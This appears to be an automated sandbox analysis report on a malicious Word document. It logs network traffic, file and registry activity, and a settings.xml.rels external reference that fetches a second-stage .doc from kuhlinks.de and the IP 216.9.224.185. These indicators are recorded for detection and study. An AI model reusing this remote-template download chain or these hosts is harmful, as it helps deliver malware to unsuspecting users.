Source: global traffic	HTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185

Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185

Source: global traffic	HTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185

Source: global traffic	DNS traffic detected: DNS query: kuhlinks.de
Source: global traffic	DNS traffic detected: DNS query: 185.224.9.216.in-addr.arpa

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60838
Source: unknown	Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60843

Source: unknown

HTTPS traffic detected: 172.67.144.140:443 -> 192.168.2.24:60832 version: TLS 1.2

Source: classification engine

Classification label: mal60.evad.winDOC@2/4@2/2

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{D9E48B00-04A9-4ACE-95E3-17B1C53AFEDC} - OProcSessId.dat

Jump to behavior

Source: IMP 7527518303 2507294.docx.doc	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.1.dr	OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: IMP 7527518303 2507294.docx.doc	Virustotal: Detection: 13%
Source: IMP 7527518303 2507294.docx.doc	ReversingLabs: Detection: 16%

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: IMP 7527518303 2507294.docx.doc	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: IMP 7527518303 2507294.docx.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.1.dr	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.1.dr	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: IMP 7527518303 2507294.docx.doc

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://goodsubmitbestthings.doc@kuhlinks.de/3ri5dvx

Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
